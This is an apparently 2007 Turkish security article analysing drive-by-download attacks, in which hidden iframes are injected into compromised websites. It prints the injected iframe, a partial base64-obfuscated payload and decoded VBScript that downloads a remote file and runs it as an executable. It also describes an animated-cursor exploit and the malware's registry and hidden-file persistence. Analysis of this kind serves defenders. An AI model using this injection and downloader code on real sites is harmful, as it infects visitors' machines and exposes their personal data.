Geçtiğimiz birkaç hafta içinde çeşitli Web sitelerinde kullanıcılara yönelik zararlı programların barındırıldığı haberleri artmaya başladı. Bu tür içeriklere sahip Web siteleri incelendiğinde ilginç sonuçlarla karşılaşılmaktadır. Bir çok Internet sitesinin ana sayfalarında yapılan küçük bir değişiklikle, kullanıcılar bu adreslere giriş yaptıklarında bilgisayarlarına zararlı programcıklar yerleşmektedir. Böylece kullanıcıların sistemleri uzaktan kontrol edilebilir duruma geçmiştir. Ayrıca bu tür zararlı programlar vasıtasıyla kullanıcıların özel bilgileri kontrol altına alınmaktadır. Web sayfalarında meydana getirilen bu değişiklikler gizli bir şekilde yapılmıştır.
Çeşitli uygulamalara ait zaaflarının ortaya çıkması demek bilgisayar kullanıcılarının kişisel bilgilerine ulaşmada bir adım daha yaklaşmak demektir. Kişisel bilgilerin ele geçirilmesinde, internet kullanıcıların güven duygusuyla bağlandığı Web sitelerinin de rol aldığını görmekteyiz.
Tehlikeli bir oyunun içerisinde rol alan bu sitelerin çoğu bu tür içeriklere sahip olduğu konusunda habersizdir. Dışarıdan bakıldığında Web sitesi olağan gözükür. Fakat arka planda farklı bir siteye yönlendirerek ve sistem zaafından yararlanarak kullanıcın bilgisayarına zararlı program yerleşmiş olur.
Saldırganın, WWW Sunucusuna erişerek .htm/.php/.asp tipi içeriklerde değişiklik yaparak siteyi ziyaret edenleri başka bir adrese yönlendirmeyi sağlar. Örnek yönlendirme: [iframe src=http://tehlikeli.adres/helptop.do?id=ad003 width=100 height=0] .
İnternet kullanıcısı internet adresine bağlanarak sayfalar arasında gezinmeye başlar. Fakat bu esnada WEB sunucuna yerleştirilen kod parçasıyla başka bir adrese yönlendirilir. Kullanıcının sisteminde bir zaaf mevcutsa zararlı program kullanıcının bilgisayarına yerleşir.
Tüm bu işlemler kullanıcıdan habersiz gerçekleşir.
Kullanıcının sistemine yerleşen program, kişisel bilgileri saldırgana gönderir ya da sistemi dışarıdan müdahaleye olanak sağlayacak durumu getirir.
Bu türdeki son örneği bir donanım üreticisinin ana Web sayfasında karşılaştık. Kullanıcılar bu donanım üreticisinin ana sayfasına bağlandıklarında başka bir sayfaya yönlendirilerek zararlı kod sisteme kopyalanıyordu. Ana sayfaya şu şekilde bir eklenti yapılmıştı:
...
{/tr}
{/table}
{iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0}
{/iframe}
{/td}
…
Kullanıcı yönlendirildiği sayfanın içeriği:
{SCRIPT LANGUAGE="JavaScript" src="./top/top.js"}{/script}{SCRIPT LANGUAGE="JavaScript"}
var g = "ODNBLTAwQzA0RkMyOUUzNiINCiAgICBYTUwxID0gIk1pYyINCiAgICBYTUwyID0gInJvc29md
C5YTUxIVFRQIg0KICAgIEFkb1NxYTEgPSAiQWRvZGIuUyINCi
AgICBBZG9TcWEyID0gInRyZWFtIg0KICAgIG9HZXQgICA9ICJHRVQiDQogICAgZm5hbWUxI
D0gIlRyYWR1ZS5jb20iDQogICAgU0ZPICAgID0gIlNjcmlwdGluZy5
GaWxlU3lzdGVtT2JqZWN0Ig0KI….
….
….
"; lamers (aa(g,122));{/SCRIPT}
Base64 şeklinden normal dönüşüm yapıldığında kodu şu şekilde görürüz:
….
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
if Not Err.Number = 0 then
err.clear
lamers ("{iframe src=cc.do?id=ad003 width=100 height=0}")
else
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
...
Kullanıcıdan habersiz next3.png isimli dosya sisteme indirilerek tradue.com şeklinde çalıştırılır. Ayrıca kullanıcının sisteminde güncel bir açık(.ani exploit) varsa program otomatik olarak başka bir site üzerinden sisteme kurulacaktır.
{html}
{body}
{DIV style="CURSOR: url('./bmw3.pig')"}
{/DIV}
{/body}
{/html}
Hex / bmw3.pig/
Yukarıda bmw3.pig isimli dosyanın içeriği gözükmektedir. Bu “Animated Cursor” tipi dosyalarına özgü olan bir açıktan faydalanarak sisteme zararlı program yüklemeye çalışan bir dosyadır.
Web sayfalarını gezerken ansızın açılan pencereler, sistem kilitlenmeleri kötü bir haberin başlangıcı olabilir. Yeni bir güvenlik zaafı ortaya çıktığında bu istismarın tehlike boyutunu arttıracak çeşitli yöntemlerde ortaya çıkmaktadır. Bilinen yöntemleri takip etmek kolay olabilir.
Fakat Antivirus, Firewall gibi yazılımları atlatacak yöntemlerin ortaya çıkması internet kullanıcılarını zor durumda bırakması içten bile değildir.
Adım adım bir zararlı uygulamanın sisteme erişmesini inceleyelim:
* WEB Sayfaları arasındaki gezintiler esnasında istemediğiniz bir bağlantının meydana getirdikleri sisteminizi sizin kontrolü haricinde başka kesimlere de kontrol etme imkanı sağlayabilir. Yukarıdaki resimde görüldüğü gibi bağlantı sağlanan sayfa isteğiniz dışında bazı işlemleri gerçekleştirmeye zemin hazırlar. Burada yer alan resimler sniffer(paket koklayıcı) programı ile elde edilmiştir.
* Arka planda calışan sayfa işletim sistemi kontrolünü gerçekleştirmektedir. Kontrol işlemi sonucu istenilen işletim sistemini kullanıyorsanız tehlikeli bir kapının yanına yaklaştınız demektir.
* Resimde görüldüğü gibi işletim sisteminiz güvenlik zaafı sonucunda uzaktan sisteminize istenilen uygulama aktarılıyor.
* Zararlı program sisteme yüklenmeye başlamıştır. Sniffer ile tespit edilen paket kontrol edildiğinde bunun bir .exe uygulaması olduğu görülür(Başlık: MZP).
Sisteme aktarılan bu uygulama derinlemesine incelendiğinde;
Registry ayarlarında kullanıcının bilgisi dahilinde olmayan değişiklikler yapmaktadır.
* Bir çok zararlı programların temel huyu registry kayıtlarında kendine göre oynama yapmaktır. Böylece sistemin açılışında otomatik aktif olur ve internet Explorer gibi browserlarda kontrolü ele alır.
* Kendini gizlemek çeşitli yöntemler kullanır. Bunun için güvenilir bir imaj sağlamış olan herhangi bir dizine kendisini kopyalar (Örn: C:\Program Files\Microsoft Shared\MSINFO”).
* Zararlı uygulama kendini dizine kopyalamıştır. Fakat görünürde işletim sistemine ait uygulamalardan başka bir uygulama görünmemektedir.
* Bilindik bir komut olan “dir” komutuyla dizini incelediğimizde yine işletim sistemine ait dosyalar görünüyor.
* dir /ah komutuyla gizli dosyaları rahatlıkla görüyoruz. “NewInfo.dll” ve “system.2dt” isimli dosyalar sistemi takip etmek için kullanıcıdan habersiz bir güvenlik zaafından yararlanılarak sisteme yüklenmiştir.
Internet kullanıcılarının kişisel bilgilerini ele geçirmek için kullanıcılar tarafından sıklıkla ziyaret edilen Web sayfaları birer hedef haline dönüşmektedir. Bu kişi/kişiler Web sayfalarında görünür bir değişiklik yapmaktansa gizli kodlar ekleyerek kullanıcıların kişisel bilgilerini ele geçirme yolunu tercih ederler.
Çarş. Kas. 07, 2007 7:36 pm